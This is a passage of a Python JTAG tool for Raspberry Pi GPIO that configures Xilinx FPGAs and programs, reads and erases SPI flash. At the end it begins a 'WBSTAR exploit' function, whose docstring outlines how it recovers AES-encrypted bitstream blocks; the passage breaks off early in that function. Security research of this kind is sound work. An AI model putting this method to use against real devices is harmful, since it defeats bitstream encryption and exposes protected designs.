-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathjtag_gpio.py
executable file
·1429 lines (1242 loc) · 55.5 KB
/
jtag_gpio.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#!/usr/bin/python3
try:
import RPi.GPIO as GPIO
except RuntimeError:
print("Error importing RPi.GPIO! Did you run as root?")
import csv
import argparse
import time
import subprocess
import logging
import sys
import binascii
from Crypto.Cipher import AES
from enum import Enum
from cffi import FFI
try:
from gpioffi.lib import pi_mmio_init
except ImportError as err:
print('Module not found ({}), attempting to rebuild...'.format(err))
subprocess.call(['python3', 'build.py'])
print('Please try the command again.')
exit(1)
from gpioffi.lib import jtag_pins
from gpioffi.lib import jtag_prog
from gpioffi.lib import jtag_prog_rbk
ffi = FFI()

# maxbuf - maximum length, in bits, of a bitstream that can be handled by this script
maxbuf = 20 * 1024 * 1024

# Two zero-filled maxbuf-sized cffi char buffers.  cffi allocations made by
# this script are also appended to `keepalive` so they remain referenced for
# the lifetime of the process.
ffistr = ffi.new("char[]", bytes(maxbuf))
ffiret = ffi.new("char[]", bytes(maxbuf))
keepalive = [ffistr, ffiret]

# Default GPIO assignments; main() exposes --tck/--tms/--tdi/--tdo/--prg
# options with these same defaults.
TCK_pin = 4
TMS_pin = 17
TDI_pin = 27  # TDI on FPGA, out for this script
TDO_pin = 22  # TDO on FPGA, in for this script
PRG_pin = 24
class JtagLeg(Enum):
    """Kind of a queued JTAG operation ("leg").

    Legs are queued in ``jtag_legs`` as ``[JtagLeg, bit_string, label]``;
    ``jtag_step`` picks the TAP walk to perform from this kind.
    """
    DR = 0   # data register shift; last character of the bit string goes out first
    IR = 1   # instruction register shift
    RS = 2   # reset (twelve TCK cycles with TMS high)
    DL = 3   # long delay (5 ms sleep)
    ID = 4   # idle in run-test (one TCK cycle with TMS low)
    IRP = 5  # IR with pause
    IRD = 6  # transition to IR directly
    DRC = 7  # DR for config: MSB-to-LSB order, and use fast protocols
    DRR = 8  # DR for recovery: print out the value returned in non-debug modes
    DRS = 9  # DR for SPI: MSB-to-LSB order, use fast protocols, but also readback data
class JtagState(Enum):
    """States of the software TAP-controller model driven by ``jtag_step``.

    The DR and IR scan columns share one set of states; which register is
    being scanned is implied by the leg currently in progress.
    """
    TEST_LOGIC_RESET = 0
    RUN_TEST_IDLE = 1
    SELECT_SCAN = 2
    CAPTURE = 3
    SHIFT = 4
    EXIT1 = 5
    PAUSE = 6
    EXIT2 = 7
    UPDATE = 8
# Mutable driver state, shared through module globals by jtag_step(),
# jtag_next() and the command functions.
state = JtagState.RUN_TEST_IDLE  # where the software TAP model currently is
cur_leg = []           # leg in progress: [JtagLeg, bit string, label]
jtag_legs = []         # queue of pending legs, consumed from the front
tdo_vect = ''          # TDO bits collected during the current shift
tdo_stash = ''         # copy of tdo_vect saved on EXIT1
jtag_results = []      # integer value of every completed shift, in order
do_pause = False       # route the current IR shift through PAUSE (set for IRP legs)
gpio_pointer = 0       # handle passed to the gpioffi helpers; presumably set by main() - confirm
compat = False         # True: bit-bang through RPi.GPIO instead of the gpioffi helpers
readout = False        # True: latch the next shift result into readdata
readdata = 0           # last value captured by a DRR/DRS leg

# Options for the WBSTAR readout (do_wbstar); main() declares these global.
use_key = False
nky_key = nky_iv = nky_hmac = ''
use_fuzzer = False
from math import log
def bytes_needed(n):
    """Return how many whole bytes are needed to hold the non-negative int *n*.

    Zero still occupies one byte.  The count is computed with exact integer
    arithmetic; deriving it from ``math.log(n, 256)`` is subject to float
    rounding and misjudges values at or just below a power of 256 (for
    instance ``2**64 - 1`` and ``2**64`` round to the same float).

    Raises:
        ValueError: if *n* is negative (``math.log`` raised it before too).
    """
    if n < 0:
        raise ValueError("bytes_needed() requires a non-negative integer, got {}".format(n))
    if n == 0:
        return 1
    return (n.bit_length() + 7) // 8
def int_to_binstr(n):
    """Render *n* as a '0'/'1' string left-padded to a whole number of bytes."""
    digits = bin(n)[2:]
    width = 8 * bytes_needed(n)
    return digits.rjust(width, '0')
def int_to_binstr_bitwidth(n, bitwidth):
    """Render *n* as a '0'/'1' string left-padded with zeros to *bitwidth* characters.

    Values wider than *bitwidth* come back unpadded; nothing is truncated.
    """
    digits = bin(n)[2:]
    padding = '0' * max(bitwidth - len(digits), 0)
    return padding + digits
def phy_sync(tdi, tms):
    """Clock one TCK cycle with the given TDI/TMS levels and return TDO.

    In compat mode TDO is sampled through RPi.GPIO before the clock moves,
    then TCK is driven low, high, low with TDI/TMS held.  Otherwise the
    gpioffi helper ``jtag_pins`` performs the cycle and its result is
    returned as TDO.
    """
    if not compat:
        return jtag_pins(tdi, tms, gpio_pointer)
    pins = (TCK_pin, TDI_pin, TMS_pin)
    tdo = GPIO.input(TDO_pin)  # grab the TDO value before the clock changes
    for tck in (0, 1, 0):
        GPIO.output(pins, (tck, tdi, tms))
    return tdo
def reset_fpga():
    """Drive PRG_pin low for 0.1 s, then high again."""
    low_time = 0.1
    GPIO.output(PRG_pin, 0)
    time.sleep(low_time)
    GPIO.output(PRG_pin, 1)
# Mnemonics for the 6-bit instruction-register opcodes decode_ir() knows.
_IR_NAMES = {
    0b100110: 'EXTEST',
    0b111100: 'EXTEST_PULSE',
    0b111101: 'EXTEST_TRAIN',
    0b000001: 'SAMPLE',
    0b000010: 'USER1',
    0b000011: 'USER2',
    0b100010: 'USER3',
    0b100011: 'USER4',
    0b000100: 'CFG_OUT',
    0b000101: 'CFG_IN',
    0b001001: 'IDCODE',
    0b001010: 'HIGHZ_IO',
    0b001011: 'JPROGRAM',
    0b001100: 'JSTART',
    0b001101: 'JSHUTDOWN',
    0b110111: 'XADC_DRP',
    0b010000: 'ISC_ENABLE',
    0b010001: 'ISC_PROGRAM',
    0b010010: 'XSC_PROGRAM_KEY',
    0b010111: 'XSC_DNA',
    0b110010: 'FUSE_DNA',
    0b010100: 'ISC_NOOP',
    0b010110: 'ISC_DISABLE',
    0b111111: 'BYPASS',
    0b110001: 'FUSE_KEY',
    0b110011: 'FUSE_USER',
    0b110100: 'FUSE_CNTL',
}


def decode_ir(ir):
    """Return the mnemonic for instruction opcode *ir*, or '' when it is unknown."""
    return _IR_NAMES.get(ir, '')
def debug_spew(cur_leg):
    """Log a debug line describing the JTAG leg that is about to start.

    Bulk legs (DRC/DRS) only report their payload length.  Every other leg
    logs the whole leg, its bit string decoded as an IR opcode (DR payloads
    are decoded too, so their opcode name may be spurious) and its label.
    """
    kind = cur_leg[0]
    if kind in (JtagLeg.DRC, JtagLeg.DRS):
        logging.debug("start: %s config data of length %s", kind, str(len(cur_leg[1])))
        return
    opcode_name = decode_ir(int(cur_leg[1], 2))
    logging.debug("start: %s (%s) / %s", str(cur_leg), str(opcode_name), str(cur_leg[2]))
# take a trace and attempt to extract IR, DR values
# assume: at the start of each 'trace' we are coming from TEST-LOGIC-RESET
def jtag_step():
    """Advance the software TAP-controller model by one state.

    DR and IR scans share one set of states (SELECT_SCAN, CAPTURE, SHIFT,
    ...).  Each call clocks the TCK cycle(s) for the current state, takes
    legs from ``jtag_legs`` into ``cur_leg`` as needed, accumulates TDO bits
    in ``tdo_vect`` and, on UPDATE, appends the shifted-out value to
    ``jtag_results`` (and stores it in ``readdata`` for DRR/DRS legs).

    DR/IR legs shift their bit string last character first, one call per
    bit.  DRC/DRS legs shift first character first in a single call, through
    the gpioffi helpers unless ``compat`` is set.

    NOTE(review): RS, DL and ID legs pop the following leg unconditionally,
    so queuing one of them last raises IndexError.
    """
    global state, cur_leg, tdo_vect, tdo_stash, do_pause, readout, readdata

    if state == JtagState.TEST_LOGIC_RESET:
        phy_sync(0, 0)
        state = JtagState.RUN_TEST_IDLE

    elif state == JtagState.RUN_TEST_IDLE:
        if len(cur_leg):
            kind = cur_leg[0]
            if kind in (JtagLeg.DR, JtagLeg.DRC, JtagLeg.DRR, JtagLeg.DRS):
                phy_sync(0, 1)  # one TMS-high clock: toward the DR scan
                # DRR/DRS results are latched into readdata on UPDATE
                readout = kind in (JtagLeg.DRR, JtagLeg.DRS)
                state = JtagState.SELECT_SCAN
            elif kind in (JtagLeg.IR, JtagLeg.IRD, JtagLeg.IRP):
                phy_sync(0, 1)  # two TMS-high clocks: toward the IR scan
                phy_sync(0, 1)
                do_pause = kind == JtagLeg.IRP
                state = JtagState.SELECT_SCAN
            elif kind == JtagLeg.RS:
                logging.debug("tms reset")
                for _ in range(12):
                    phy_sync(0, 1)
                cur_leg = jtag_legs.pop(0)
                debug_spew(cur_leg)
                state = JtagState.TEST_LOGIC_RESET
            elif kind == JtagLeg.DL:
                time.sleep(0.005)  # 5ms delay
                cur_leg = jtag_legs.pop(0)
                debug_spew(cur_leg)
            elif kind == JtagLeg.ID:
                phy_sync(0, 0)
                cur_leg = jtag_legs.pop(0)
                debug_spew(cur_leg)
        else:
            if len(jtag_legs):
                cur_leg = jtag_legs.pop(0)
                debug_spew(cur_leg)
            else:
                phy_sync(0, 0)
            state = JtagState.RUN_TEST_IDLE

    elif state == JtagState.SELECT_SCAN:
        phy_sync(0, 0)
        state = JtagState.CAPTURE

    elif state == JtagState.CAPTURE:
        phy_sync(0, 0)
        tdo_vect = ''  # prep the tdo_vect to receive data
        state = JtagState.SHIFT

    elif state == JtagState.SHIFT:
        if cur_leg[0] == JtagLeg.DRC or cur_leg[0] == JtagLeg.DRS:
            # Bulk-shift every bit except the last, first character first.
            bits = cur_leg[1]
            if cur_leg[0] == JtagLeg.DRC:
                # duplicate code because we want speed (eliminating TDO readback is significant speedup)
                if compat:
                    GPIO.output((TCK_pin, TDI_pin), (0, 1))
                    for bit in bits[:-1]:
                        if bit == '1':
                            GPIO.output((TCK_pin, TDI_pin), (1, 1))
                            GPIO.output((TCK_pin, TDI_pin), (0, 1))
                        else:
                            GPIO.output((TCK_pin, TDI_pin), (1, 0))
                            GPIO.output((TCK_pin, TDI_pin), (0, 0))
                else:
                    bytestr = bytes(bits[:-1], 'utf-8')
                    ffi = FFI()
                    ffistr = ffi.new("char[]", bytestr)
                    keepalive.append(ffistr)  # need to make sure the lifetime of the string is long enough for the call
                    jtag_prog(ffistr, gpio_pointer)
                    GPIO.output(TCK_pin, 0)  # restore this to 0, as jtag_prog() leaves TCK high when done
            else:  # jtagleg is DRS -- duplicate code, as TDO readback slows things down significantly
                if compat:
                    GPIO.output((TCK_pin, TDI_pin), (0, 1))
                    for bit in bits[:-1]:
                        if bit == '1':
                            GPIO.output((TCK_pin, TDI_pin), (1, 1))
                            GPIO.output((TCK_pin, TDI_pin), (0, 1))
                        else:
                            GPIO.output((TCK_pin, TDI_pin), (1, 0))
                            GPIO.output((TCK_pin, TDI_pin), (0, 0))
                        tdo = GPIO.input(TDO_pin)
                        tdo_vect = ('1' if tdo == 1 else '0') + tdo_vect
                else:
                    bytestr = bytes(bits[:-1], 'utf-8')
                    tdo_temp = '0' * len(bits[:-1])  # initialize space for tdo_vect
                    retstr = bytes(tdo_temp, 'utf-8')
                    ffi = FFI()
                    ffistr = ffi.new("char[]", bytestr)
                    ffiret = ffi.new("char[]", retstr)
                    keepalive.append(ffistr)  # need to make sure the lifetime of the string is long enough for the call
                    keepalive.append(ffiret)
                    jtag_prog_rbk(ffistr, gpio_pointer, ffiret)
                    tdo_vect = ffi.string(ffiret).decode('utf-8')
            # The final bit is clocked with TMS=1 to leave SHIFT.  It is the
            # LAST character of the bit string.  (Testing `cur_leg[-1:]`
            # compared a list slice with a str, which is never equal, so a
            # trailing '1' was always sent as 0.)
            tdi = 1 if bits[-1:] == '1' else 0
            cur_leg = ''
            tdo = phy_sync(tdi, 1)
            tdo_vect = ('1' if tdo == 1 else '0') + tdo_vect
            state = JtagState.EXIT1
            logging.debug('leaving config')
        else:
            bits = cur_leg[1]
            if len(bits) > 1:
                # shift the last remaining character with TMS=0, then drop it from the leg
                tdi = 1 if bits[-1] == '1' else 0
                cur_leg[1] = bits[:-1]
                tdo = phy_sync(tdi, 0)
                tdo_vect = ('1' if tdo == 1 else '0') + tdo_vect
                state = JtagState.SHIFT
            else:  # this is the last item: shift it with TMS=1 to leave SHIFT
                tdi = 1 if bits[0] == '1' else 0
                cur_leg = ''
                tdo = phy_sync(tdi, 1)
                tdo_vect = ('1' if tdo == 1 else '0') + tdo_vect
                state = JtagState.EXIT1

    elif state == JtagState.EXIT1:
        tdo_stash = tdo_vect
        if do_pause:
            phy_sync(0, 0)
            state = JtagState.PAUSE
            do_pause = False
        else:
            phy_sync(0, 1)
            state = JtagState.UPDATE

    elif state == JtagState.PAUSE:
        logging.debug("pause")
        # we could put more pauses in here but we haven't seen this needed yet
        phy_sync(0, 1)
        state = JtagState.EXIT2

    elif state == JtagState.EXIT2:
        phy_sync(0, 1)
        state = JtagState.UPDATE

    elif state == JtagState.UPDATE:
        jtag_results.append(int(tdo_vect, 2))  # interpret the vector and save it
        logging.debug("result: %s", str(hex(int(tdo_vect, 2))))
        if readout:
            readdata = int(tdo_vect, 2)
            readout = False
        tdo_vect = ''
        # handle case of "shortcut" to DR: go straight from UPDATE into the
        # next scan instead of passing through RUN_TEST_IDLE
        if len(jtag_legs):
            next_kind = jtag_legs[0][0]
            if next_kind in (JtagLeg.DR, JtagLeg.IRP, JtagLeg.IRD):
                if next_kind in (JtagLeg.IRP, JtagLeg.IRD):
                    phy_sync(0, 1)  # +1 cycle on top of the DR cycle below
                    logging.debug("IR bypassing wait state")
                    if next_kind == JtagLeg.IRP:
                        do_pause = True
                cur_leg = jtag_legs.pop(0)
                debug_spew(cur_leg)
                phy_sync(0, 1)
                state = JtagState.SELECT_SCAN
            else:
                phy_sync(0, 0)
                state = JtagState.RUN_TEST_IDLE
        else:
            phy_sync(0, 0)
            state = JtagState.RUN_TEST_IDLE

    else:
        print("Illegal state encountered!")
def jtag_next():
    """Step the TAP model until the current (or next queued) leg completes.

    From a resting state with legs pending, steps until the machine leaves
    rest and then until it rests again.  From a resting state with nothing
    queued, takes exactly one step.  From inside a leg, steps until it rests.
    TEST_LOGIC_RESET and RUN_TEST_IDLE count as resting states.
    """
    def at_rest():
        return state in (JtagState.TEST_LOGIC_RESET, JtagState.RUN_TEST_IDLE)

    if at_rest():
        if not jtag_legs:
            jtag_step()  # nothing queued: a single (idle) step
            return
        while at_rest():  # run until out of idle
            jtag_step()
    while not at_rest():  # run to idle
        jtag_step()
def do_spi_bitstream(ifile, jtagspi='xc7s50', address=0, verify=True, do_reset=False, raw_binary=False, key=None):
    """Program *ifile* into the SPI flash behind the FPGA through a JTAGSPI bridge.

    The ``jtagspi/bscan_spi_<jtagspi>.bit`` helper is configured first (via
    do_bitstream, optionally encrypted with *key*), then USER1 is loaded into
    the IR and the flash is driven through ``SpiPort(1)`` and an
    ``Mx66umFlashDevice``.

    Args:
        ifile: image to program.  Unless *raw_binary* is set, everything
            before the first 0xaa995566 sync word is skipped.
        jtagspi: helper bitstream variant name.
        address: flash byte address to program at.
        verify: read the data back and compare it after writing.
        do_reset: pulse PROG after the helper legs are queued, before they run.
        raw_binary: program the file verbatim.
        key: forwarded to do_bitstream().
    """
    from serialflash import Mx66umFlashDevice

    if address >= 0x1000000:
        print("WARNING: 4-byte addressing required, address 0x{:0x}.".format(address))
    virtualspi = SpiPort(1)

    benchmark = False  # set True to time 1000 JEDEC-ID reads instead of programming
    if benchmark:
        from progressbar.bar import ProgressBar
        # issue the command to get us into writing the USER1 IR
        jtag_legs.append([JtagLeg.IR, '000010', 'user1'])
        while jtag_legs:
            jtag_next()
        progress = ProgressBar(min_value=0, max_value=1000).start()
        for i in range(1000):
            progress.update(i)
            virtualspi.exchange(bytes((0x9f,)), 3)
        progress.finish()
        return

    # first load the jtagspi bitstream
    jtagspi_bitstream = 'jtagspi/bscan_spi_{}.bit'.format(jtagspi)
    do_bitstream(jtagspi_bitstream, key=key)
    if do_reset:
        reset_fpga()
    while jtag_legs:  # flush the commands from do_bitstream()
        jtag_next()

    with open(ifile, "rb") as f:
        binfile = f.read()
    image_end = len(binfile) + address
    if image_end >= 0x1380000:
        print('Warning: Image exceeds the current upper bound for kernel data')
    elif image_end >= 0x1000000:
        # only meaningful below the bound, otherwise "remaining" is negative
        print('Warning: kernel is getting bloated. Space remaining: {} bytes'.format(0x1380000 - image_end))

    position = 0
    if not raw_binary:
        # skip any header before the first sync word
        position = binfile.find(b'\xaa\x99\x55\x66')
        if position < 0:
            position = len(binfile)
    program_data = binfile[position:]
    if not program_data:
        # An empty image would erase and write nothing, yet verify as a success.
        print("Error: nothing to program from {} (empty file, or no 0xaa995566 sync word found)".format(ifile))
        return

    # issue the command to get us into writing the USER1 IR
    jtag_legs.append([JtagLeg.IR, '000010', 'user1'])
    while jtag_legs:
        jtag_next()
    virtualspi = SpiPort(1)
    flash_id = virtualspi.exchange(bytes((0x9f,)), 3)  # JEDEC read-ID command
    virtualflash = Mx66umFlashDevice(virtualspi, flash_id)

    erase_size = virtualflash.get_erase_size()
    print("Using erase block size of {} bytes".format(erase_size))
    erase_size_in_sectors, remainder = divmod(len(program_data), erase_size)
    if remainder:
        erase_size_in_sectors += 1  # round up to whole erase blocks
    print("Using erase block size of {} bytes, erasing {} blocks from 0x{:08x} to 0x{:08x} (rounded up from 0x{:08x})".format(erase_size, erase_size_in_sectors, address, address + erase_size_in_sectors * erase_size, address + len(program_data)))
    virtualflash.erase(address, erase_size_in_sectors * erase_size)
    virtualflash.write(address, program_data)

    if verify:
        print("Reading back data for verification...")
        read_data = virtualflash.read(address, len(program_data))
        print("Comparing data...")
        failures = 0 if read_data == program_data else 1
        detailed_compare = False  # set True to report individual mismatching bytes
        if detailed_compare:
            from progressbar.bar import ProgressBar
            progress = ProgressBar(min_value=0, max_value=len(program_data), prefix='Verifying ').start()
            update_every = max(1, len(program_data) // 100)  # avoid modulo by zero on tiny images
            failures = 0
            for i, want in enumerate(program_data):
                if i % update_every == 0:
                    progress.update(i)
                if i >= len(read_data):
                    print("Verify failure: readback data is shorter than programmed data")
                    failures += 1
                    break
                if read_data[i] != want:
                    print("Verify fail at 0x{:08x}, want 0x{:02x}, got 0x{:02x}".format(i, want, read_data[i]))
                    failures += 1
                if failures > 64:
                    print("Too many failures, terminating verification.")
                    break
            progress.finish()
        if failures == 0:
            print("Programming verification succeeded")
        else:
            print("Programming verification FAILED: readback does not match the image")
    print("Programming concluded")
def read_spi_bitstream(ofile, jtagspi='xc7s50', address=0, read_len=0x280000, do_reset=False, key=None):
    """Copy *read_len* bytes of SPI flash, starting at *address*, into *ofile*.

    Configures the ``jtagspi/bscan_spi_<jtagspi>.bit`` helper (optionally
    pulsing PROG), loads USER1 into the IR and reads through an
    ``Mx66umFlashDevice`` bound to ``SpiPort(1)``.
    """
    from serialflash import Mx66umFlashDevice

    if address >= 0x1000000:
        print("Warning: 4-byte addressing required (0x{:x}).".format(address))
    spi = SpiPort(1)

    helper = 'jtagspi/bscan_spi_{}.bit'.format(jtagspi)
    do_bitstream(helper, key=key)
    if do_reset:
        reset_fpga()
    while jtag_legs:  # drain the legs queued by do_bitstream()
        jtag_next()

    # load USER1 (0b000010) into the IR before talking to the flash
    jtag_legs.append([JtagLeg.IR, '000010', 'user1'])
    while jtag_legs:
        jtag_next()

    spi = SpiPort(1)
    jedec_id = spi.exchange(bytes((0x9f,)), 3)
    flash = Mx66umFlashDevice(spi, jedec_id)

    with open(ofile, "wb") as out:
        print("Reading back data...")
        out.write(flash.read(address, read_len))
    print("Read concluded")
def erase(jtagspi='xc7s50', address=0, erase_len=0x280000, do_reset=False, key=None):
    """Erase SPI flash from *address*, covering *erase_len* bytes rounded up to erase blocks.

    Configures the ``jtagspi/bscan_spi_<jtagspi>.bit`` helper (optionally
    pulsing PROG), loads USER1 into the IR and erases through an
    ``Mx66umFlashDevice`` bound to ``SpiPort(1)``.
    """
    from serialflash import Mx66umFlashDevice

    if address >= 0x1000000:
        print("Warning: 4-byte addressing required, address 0x{:0x}.".format(address))
    spi = SpiPort(1)

    helper = 'jtagspi/bscan_spi_{}.bit'.format(jtagspi)
    do_bitstream(helper, key=key)
    if do_reset:
        reset_fpga()
    while jtag_legs:  # drain the legs queued by do_bitstream()
        jtag_next()

    # load USER1 (0b000010) into the IR before talking to the flash
    jtag_legs.append([JtagLeg.IR, '000010', 'user1'])
    while jtag_legs:
        jtag_next()

    spi = SpiPort(1)
    jedec_id = spi.exchange(bytes((0x9f,)), 3)
    flash = Mx66umFlashDevice(spi, jedec_id)

    block_bytes = flash.get_erase_size()
    print("Using erase block size of {} bytes".format(block_bytes))
    sectors, leftover = divmod(erase_len, block_bytes)
    if leftover:
        sectors += 1  # partial block still needs a whole erase
    span = sectors * block_bytes
    print("Using erase block size of {} bytes, erasing {} blocks from 0x{:08x} to 0x{:08x} (rounded up from 0x{:08x})".format(block_bytes, sectors, address, address + span, address + erase_len))
    flash.erase(address, span)
    print("Erase concluded")
def do_bitstream(ifile, key=None):
    """Queue the JTAG legs that configure the FPGA with bitstream *ifile*.

    Nothing is clocked here; the caller drains ``jtag_legs`` with
    jtag_next().  Everything before the first 0xaa995566 sync word in the
    file is skipped.

    Args:
        ifile: bitstream path.
        key: when given, ./encrypt-bitstream.py encrypts
            jtagspi/bscan_spi_xc7s50.bin with this key into
            bscan_spi_local.bin, and that file is used instead of *ifile*.

    Raises:
        subprocess.CalledProcessError: if the encryption helper fails.
    """
    if key is not None:
        # NOTE(review): the encrypted helper is hard-coded to the xc7s50
        # variant regardless of *ifile* - confirm before using other variants.
        # check=True so a failed encryption cannot fall through to a stale
        # or missing bscan_spi_local.bin.
        subprocess.run(["./encrypt-bitstream.py", "-i", "0", "-f", "jtagspi/bscan_spi_xc7s50.bin", "--key", key, "-o", "bscan_spi_local.bin", "-d"], check=True)
        ifile = "bscan_spi_local.bin"
    logging.debug("Using helper bitstream: %s", ifile)

    with open(ifile, "rb") as f:
        binfile = f.read()
    position = binfile.find(b'\xaa\x99\x55\x66')
    if position < 0:
        logging.warning("No 0xaa995566 sync word found in %s", ifile)
        position = len(binfile)
    config_data = int_to_binstr(int.from_bytes(binfile[position:], byteorder='big'))
    logging.debug("Config data is %d bits long", len(config_data))

    # Fresh list literals on every call: jtag_step() mutates leg lists in place.
    jtag_legs.extend([
        [JtagLeg.RS, '0', 'reset'],
        [JtagLeg.IR, '001001', 'idcode'],
        [JtagLeg.DR, '00000000000000000000000000000000', ' '],
        [JtagLeg.RS, '0', 'reset'],
        [JtagLeg.IR, '001011', 'jprogram'],
        [JtagLeg.IR, '010100', 'isc_noop'],
        [JtagLeg.DL, '0', 'initdelay'],
        [JtagLeg.IR, '010100', 'isc_noop'],
        [JtagLeg.RS, '0', 'reset'],
        [JtagLeg.IRD, '000101', 'cfg_in'],
        [JtagLeg.DRC, config_data, 'config_data'],
        [JtagLeg.RS, '0', 'reset'],
        [JtagLeg.IR, '001001', 'idcode'],
        [JtagLeg.DR, '00000000000000000000000000000000', ' '],
    ])
    logging.debug("Config data uploaded")
"""
Reverse the order of bits in a word that is bitwidth bits wide
"""
# Maps every byte value to the byte with its 8 bits in reverse order.
_BIT_REVERSE_TABLE = bytes(int('{:08b}'.format(v)[::-1], 2) for v in range(256))


def bitflip(data_block, bitwidth=32):
    """Reverse the order of bits within each *bitwidth*-bit word of *data_block*.

    Words are read big-endian.  A trailing partial word is left-padded with
    zero bytes to a full word before it is reversed, so the output length is
    always a whole number of words.  A *bitwidth* of 0 returns *data_block*
    unchanged.

    Reversing the bits of a word is the same as reversing its byte order and
    then bit-reversing each byte, which is what the lookup table does.

    Raises:
        ValueError: if *bitwidth* is negative or not a multiple of 8 (such
            widths previously looped forever or raised OverflowError).
    """
    if bitwidth == 0:
        return data_block
    if bitwidth < 0 or bitwidth % 8:
        raise ValueError("bitwidth must be a positive multiple of 8, got {}".format(bitwidth))
    bytewidth = bitwidth // 8
    bitswapped = bytearray()
    for start in range(0, len(data_block), bytewidth):
        word = bytes(data_block[start:start + bytewidth]).rjust(bytewidth, b'\x00')
        bitswapped += word[::-1].translate(_BIT_REVERSE_TABLE)
    return bytes(bitswapped)
def do_wbstar(ifile, offset):
    """Recover one 128-bit AES block of an encrypted bitstream (WBSTAR exploit).

    Reads the encrypted bitstream *ifile* and locates three things: the IV
    (the 4 words after the 0x30016004 word), the ciphertext-length word
    (after 0x30034001) and the 0xaa995566 sync word.  The length is patched
    to 0x98 words.

    For each of the four 32-bit words of block *offset*, a modified copy of
    the stream is shifted in through CFG_IN.  In that copy, block
    ``offset - 1`` and block *offset* are spliced in after the first six AES
    blocks, the WBSTAR write length is mutated, and words recovered earlier
    are patched to NOPs.  A readout command (encrypted with the .nky key when
    ``use_key`` is set) is then sent.  The word read back through CFG_OUT by
    a DRR leg (left in the global ``readdata``) is recorded.  The four words
    are printed as one hex block.

    Args:
        ifile: path of the encrypted bitstream file.
        offset: index of the 128-bit block to recover; must be >= 1 because
            the preceding block is copied in alongside it.
    """
    global readdata
    global use_key, nky_key, nky_iv, nky_hmac, use_fuzzer
    if offset < 1:
        print("Offset {} is too small. Must be greater than 0.".format(offset))
        # NOTE(review): exits with status 0 even though this is an error path.
        exit(0)
    with open(ifile, "rb") as f:
        binfile = bytearray(f.read())
    # search for structure
    # 0x3001_6004 -> header word; the next 4 words are the CBC IV
    # 0x3003_4001 -> ciphertext len
    # 1 word of ciphertext len
    # then ciphertext
    # The scan advances one byte at a time and stops at the length header;
    # iv_pos/sync_pos keep the last match seen before it.
    # NOTE(review): if 0x30034001 is never found, `position` ends at
    # len(binfile) and the length patch below raises IndexError.
    position = 0
    iv_pos = 0
    sync_pos = 0
    while position < len(binfile):
        cwd = int.from_bytes(binfile[position:position+4], 'big')
        if cwd == 0x30016004:
            iv_pos = position+4
        if cwd == 0x30034001:
            break
        if cwd == 0xaa995566:
            sync_pos = position
        position = position + 1
    position = position + 4
    ciphertext_len = 4* int.from_bytes(binfile[position:position+4], 'big')
